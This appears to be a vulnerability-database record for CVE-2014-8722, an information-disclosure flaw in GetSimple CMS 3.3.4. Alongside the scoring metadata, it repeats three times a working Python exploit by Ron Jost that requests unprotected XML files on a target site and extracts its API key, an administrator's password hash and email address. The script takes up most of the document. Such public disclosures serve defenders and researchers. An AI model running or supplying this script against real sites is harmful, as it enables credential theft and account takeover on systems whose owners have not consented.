GetSimple CMS 3.3.4 Information Disclosure

2021-06-02T00:00:00

Description

{"id": "PACKETSTORM:162906", "vendorId": null, "type": "packetstorm", "bulletinFamily": "exploit", "title": "GetSimple CMS 3.3.4 Information Disclosure", "description": "", "published": "2021-06-02T00:00:00", "modified": "2021-06-02T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {}, "cvss3": {}, "href": "https://packetstormsecurity.com/files/162906/GetSimple-CMS-3.3.4-Information-Disclosure.html", "reporter": "Ron Jost", "references": [], "cvelist": ["CVE-2014-8722"], "immutableFields": [], "lastseen": "2021-06-02T13:53:38", "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2014-8722"]}, {"type": "exploitdb", "idList": ["EDB-ID:49928"]}, {"type": "zdt", "idList": ["1337DAY-ID-36330"]}], "rev": 4}, "score": {"value": -0.3, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2014-8722"]}, {"type": "exploitdb", "idList": ["EDB-ID:49928"]}, {"type": "zdt", "idList": ["1337DAY-ID-36330"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2014-8722", "epss": "0.102110000", "percentile": "0.939930000", "modified": "2023-03-17"}], "vulnersScore": -0.3}, "_state": {"dependencies": 1678920471, "score": 1684007986, "epss": 1679073339}, "_internal": {"score_hash": "666486925d7bb110f5e2347ba8595a6d"}, "sourceHref": "https://packetstormsecurity.com/files/download/162906/getsimplecms334-disclose.txt", "sourceData": "`# Exploit Title: GetSimple CMS 3.3.4 - Information Disclosure \n# Date 01.06.2021 \n# Exploit Author: Ron Jost (Hacker5preme) \n# Vendor Homepage: http://get-simple.info/ \n# Software Link: https://github.com/GetSimpleCMS/GetSimpleCMS/archive/refs/tags/v3.3.4.zip \n# Version: 3.3.4 \n# CVE: CVE-2014-8722 \n# Documentation: https://github.com/Hacker5preme/Exploits#CVE-2014-8722-Exploit \n \n \n''' \nDescription: \nGetSimple CMS 3.3.4 allows remote attackers to obtain sensitive information via a direct request to \n(1) data/users/<username>.xml, \n(2) backups/users/<username>.xml.bak, \n(3) data/other/authorization.xml, or \n(4) data/other/appid.xml. \n''' \n \n \n''' \nImport required modules: \n''' \nimport sys \nimport requests \n \n''' \nUser-Input: \n''' \ntarget_ip = sys.argv[1] \ntarget_port = sys.argv[2] \ncmspath = sys.argv[3] \nprint('') \nusername = input(\"Do you know the username? Y/N: \") \nif username == 'Y': \nprint('') \nusername = True \nusername_string = input('Please enter the username: ') \nelse: \nprint('') \nusername = False \nprint('No problem, you will still get the API key') \n \n \n''' \nGet Api-Key: \n''' \nurl = 'http://' + target_ip + ':' + target_port + cmspath + '/data/other/authorization.xml' \nheader = { \n\"User-Agent\": \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0\", \n\"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\", \n\"Accept-Language\": \"de,en-US;q=0.7,en;q=0.3\", \n\"Accept-Encoding\": \"gzip, deflate\", \n\"Connection\": \"close\", \n\"Upgrade-Insecure-Requests\": \"1\", \n\"Cache-Control\": \"max-age=0\" \n} \nx = requests.get(url, headers=header).text \nstart = x.find('[') + 7 \nend = x.find(']') \napi_key = x[start:end] \nprint('') \nprint('Informations:') \nprint('') \nprint('[*] API Key: ' + api_key) \n \n \nif username: \n''' \nGet Email and Passwordhash: \n''' \nurl = \"http://\" + target_ip + ':' + target_port + cmspath + '/data/users/' + username_string + '.xml' \nheader = { \n\"User-Agent\": \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0\", \n\"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\", \n\"Accept-Language\": \"de,en-US;q=0.7,en;q=0.3\", \n\"Accept-Encoding\": \"gzip, deflate\", \n\"Connection\": \"close\", \n\"Upgrade-Insecure-Requests\": \"1\", \n\"Cache-Control\": \"max-age=0\" \n} \nx = requests.get(url, headers=header).text \nstart = x[x.find('PWD>'):] \npasswordhash = start[start.find('>') +1 :start.find('<')] \nprint('[*] Hashed Password: ' + passwordhash) \n \nstart = x[x.find('EMAIL>'):] \nemail = start[start.find('>') + 1 : start.find('<')] \nprint('[*] Email: ' + email) \nprint('') \n \n`\n"}

{"zdt": [{"lastseen": "2021-12-04T15:54:18", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2021-06-02T00:00:00", "type": "zdt", "title": "GetSimple CMS 3.3.4 - Information Disclosure Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8722"], "modified": "2021-06-02T00:00:00", "id": "1337DAY-ID-36330", "href": "https://0day.today/exploit/description/36330", "sourceData": "# Exploit Title: GetSimple CMS 3.3.4 - Information Disclosure\n# Exploit Author: Ron Jost (Hacker5preme)\n# Vendor Homepage: http://get-simple.info/\n# Software Link: https://github.com/GetSimpleCMS/GetSimpleCMS/archive/refs/tags/v3.3.4.zip\n# Version: 3.3.4\n# CVE: CVE-2014-8722\n# Documentation: https://github.com/Hacker5preme/Exploits#CVE-2014-8722-Exploit\n\n\n'''\nDescription:\nGetSimple CMS 3.3.4 allows remote attackers to obtain sensitive information via a direct request to\n(1) data/users/<username>.xml,\n(2) backups/users/<username>.xml.bak,\n(3) data/other/authorization.xml, or\n(4) data/other/appid.xml.\n'''\n\n\n'''\nImport required modules:\n'''\nimport sys\nimport requests\n\n'''\nUser-Input:\n'''\ntarget_ip = sys.argv[1]\ntarget_port = sys.argv[2]\ncmspath = sys.argv[3]\nprint('')\nusername = input(\"Do you know the username? Y/N: \")\nif username == 'Y':\n print('')\n username = True\n username_string = input('Please enter the username: ')\nelse:\n print('')\n username = False\n print('No problem, you will still get the API key')\n\n\n'''\nGet Api-Key:\n'''\nurl = 'http://' + target_ip + ':' + target_port + cmspath + '/data/other/authorization.xml'\nheader = {\n \"User-Agent\": \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0\",\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\",\n \"Accept-Language\": \"de,en-US;q=0.7,en;q=0.3\",\n \"Accept-Encoding\": \"gzip, deflate\",\n \"Connection\": \"close\",\n \"Upgrade-Insecure-Requests\": \"1\",\n \"Cache-Control\": \"max-age=0\"\n}\nx = requests.get(url, headers=header).text\nstart = x.find('[') + 7\nend = x.find(']')\napi_key = x[start:end]\nprint('')\nprint('Informations:')\nprint('')\nprint('[*] API Key: ' + api_key)\n\n\nif username:\n '''\n Get Email and Passwordhash:\n '''\n url = \"http://\" + target_ip + ':' + target_port + cmspath + '/data/users/' + username_string + '.xml'\n header = {\n \"User-Agent\": \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0\",\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\",\n \"Accept-Language\": \"de,en-US;q=0.7,en;q=0.3\",\n \"Accept-Encoding\": \"gzip, deflate\",\n \"Connection\": \"close\",\n \"Upgrade-Insecure-Requests\": \"1\",\n \"Cache-Control\": \"max-age=0\"\n }\n x = requests.get(url, headers=header).text\n start = x[x.find('PWD>'):]\n passwordhash = start[start.find('>') +1 :start.find('<')]\n print('[*] Hashed Password: ' + passwordhash)\n\n start = x[x.find('EMAIL>'):]\n email = start[start.find('>') + 1 : start.find('<')]\n print('[*] Email: ' + email)\nprint('')\n", "sourceHref": "https://0day.today/exploit/36330", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "cve": [{"lastseen": "2023-08-16T05:14:47", "description": "GetSimple CMS 3.3.4 allows remote attackers to obtain sensitive information via a direct request to (1) data/users/<username>.xml, (2) backups/users/<username>.xml.bak, (3) data/other/authorization.xml, or (4) data/other/appid.xml.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-03-17T14:59:00", "type": "cve", "title": "CVE-2014-8722", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8722"], "modified": "2021-06-02T16:15:00", "cpe": ["cpe:/a:get-simple:getsimple_cms:3.3.4"], "id": "CVE-2014-8722", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8722", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:get-simple:getsimple_cms:3.3.4:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2023-08-16T06:53:07", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-06-02T00:00:00", "type": "exploitdb", "title": "GetSimple CMS 3.3.4 - Information Disclosure", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["2014-8722", "CVE-2014-8722"], "modified": "2021-06-02T00:00:00", "id": "EDB-ID:49928", "href": "https://www.exploit-db.com/exploits/49928", "sourceData": "# Exploit Title: GetSimple CMS 3.3.4 - Information Disclosure\r\n# Date 01.06.2021\r\n# Exploit Author: Ron Jost (Hacker5preme)\r\n# Vendor Homepage: http://get-simple.info/\r\n# Software Link: https://github.com/GetSimpleCMS/GetSimpleCMS/archive/refs/tags/v3.3.4.zip\r\n# Version: 3.3.4\r\n# CVE: CVE-2014-8722\r\n# Documentation: https://github.com/Hacker5preme/Exploits#CVE-2014-8722-Exploit\r\n\r\n\r\n'''\r\nDescription:\r\nGetSimple CMS 3.3.4 allows remote attackers to obtain sensitive information via a direct request to\r\n(1) data/users/<username>.xml,\r\n(2) backups/users/<username>.xml.bak,\r\n(3) data/other/authorization.xml, or\r\n(4) data/other/appid.xml.\r\n'''\r\n\r\n\r\n'''\r\nImport required modules:\r\n'''\r\nimport sys\r\nimport requests\r\n\r\n'''\r\nUser-Input:\r\n'''\r\ntarget_ip = sys.argv[1]\r\ntarget_port = sys.argv[2]\r\ncmspath = sys.argv[3]\r\nprint('')\r\nusername = input(\"Do you know the username? Y/N: \")\r\nif username == 'Y':\r\n print('')\r\n username = True\r\n username_string = input('Please enter the username: ')\r\nelse:\r\n print('')\r\n username = False\r\n print('No problem, you will still get the API key')\r\n\r\n\r\n'''\r\nGet Api-Key:\r\n'''\r\nurl = 'http://' + target_ip + ':' + target_port + cmspath + '/data/other/authorization.xml'\r\nheader = {\r\n \"User-Agent\": \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0\",\r\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\",\r\n \"Accept-Language\": \"de,en-US;q=0.7,en;q=0.3\",\r\n \"Accept-Encoding\": \"gzip, deflate\",\r\n \"Connection\": \"close\",\r\n \"Upgrade-Insecure-Requests\": \"1\",\r\n \"Cache-Control\": \"max-age=0\"\r\n}\r\nx = requests.get(url, headers=header).text\r\nstart = x.find('[') + 7\r\nend = x.find(']')\r\napi_key = x[start:end]\r\nprint('')\r\nprint('Informations:')\r\nprint('')\r\nprint('[*] API Key: ' + api_key)\r\n\r\n\r\nif username:\r\n '''\r\n Get Email and Passwordhash:\r\n '''\r\n url = \"http://\" + target_ip + ':' + target_port + cmspath + '/data/users/' + username_string + '.xml'\r\n header = {\r\n \"User-Agent\": \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0\",\r\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\",\r\n \"Accept-Language\": \"de,en-US;q=0.7,en;q=0.3\",\r\n \"Accept-Encoding\": \"gzip, deflate\",\r\n \"Connection\": \"close\",\r\n \"Upgrade-Insecure-Requests\": \"1\",\r\n \"Cache-Control\": \"max-age=0\"\r\n }\r\n x = requests.get(url, headers=header).text\r\n start = x[x.find('PWD>'):]\r\n passwordhash = start[start.find('>') +1 :start.find('<')]\r\n print('[*] Hashed Password: ' + passwordhash)\r\n\r\n start = x[x.find('EMAIL>'):]\r\n email = start[start.find('>') + 1 : start.find('<')]\r\n print('[*] Email: ' + email)\r\nprint('')", "sourceHref": "https://www.exploit-db.com/raw/49928", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}]}

GetSimple CMS 3.3.4 Information Disclosure

Description

Related